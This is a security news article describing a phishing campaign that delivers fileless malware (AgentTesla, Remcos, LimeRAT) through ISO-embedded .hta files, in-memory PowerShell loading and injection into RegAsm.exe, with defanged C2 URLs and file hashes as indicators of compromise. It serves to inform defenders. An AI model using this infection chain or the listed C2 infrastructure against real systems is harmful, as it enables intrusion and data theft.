Malware

Beware of New Fileless Malware that Propagates Through Spam Mail

Recent reports suggest threat actors have used phishing emails to distribute fileless malware. The attachment consists of a .hta (HTML Application) file, which can be used for deploying other malware like AgentTesla, Remcos, and LimeRAT.

This fileless malware is a Portable Executable (PE) format, which gets executed without creating the file on the victim’s system. The phishing email has the body context stating a bank transfer notice. In addition to the email, the email has an attachment with an ISO image embedded with a .hta script file. This file runs using the mshta.exe (Microsoft HTML Application).

Fileless Malware Via Spam Mail

As per reports shared with Cyber Security News, when the victims execute this ISO file, the embedded .hta file gets executed, which creates a process tree that consists of mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe processes in order. 

ISO file embedded with .hta file (Source: AhnLab)

The mshta.exe process executes a Powershell command. The command consists of arguments to request a base64 encoded string type data from the server (DownloadString), which loads the CurrentDomain.Load data to call a function. However, there is no binary created into a PE file, but instead, the binary gets executed in the memory area of Powershell.

Payload download and memory download Source: AhnLab

Furthermore, the Powershell script also executes a DLL file decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into the RegAsm.exe (Assembly Registration Tool). This final binary could be any malware like Remcos, AgentTesla, or LimeRAT.

Base64 encoded DLL

A complete report has been published by AhnLab, which provides detailed information about the malware, PE file, DLL file, and others.

Indicator of Compromise

Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.

Guru Baran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Share
Published by
Guru Baran
Tags: cyber attackcyber securitycyber security news
8 months ago

Recent Posts

British Columbia Cyber Attack: Investigation In Progress

British Columbia's government has confirmed a sophisticated attempt to infiltrate its information systems. Premier David…

6 hours ago

New ‘TunnelVision’ Technique Allows Hackers to Bypass VPN Encryption

Security researchers have uncovered a new technique called "TunnelVision" that exposes a fundamental flaw in…

8 hours ago

New Malware Attacking Windows & MS Office Users

A sophisticated malware campaign has been identified, specifically targeting Windows and Microsoft Office users through…

8 hours ago

FIN7 Hackers Abuse Sponsored Google Ads To Deliver MSIX Payloads

Hackers take advantage of sponsored Google Ads as they provide an excellent chance to reach…

9 hours ago

New F5 Next-Gen Manager Flaw Let Attackers Take Full Admin Control

F5 Big IP has been discovered with two critical vulnerabilities that could potentially allow a…

9 hours ago

Accenture Wins $789 Million Contract to Support Global U.S. Navy Maritime Forces

Accenture Federal Services (AFS), a subsidiary of global professional services company Accenture (NYSE: ACN), has…

11 hours ago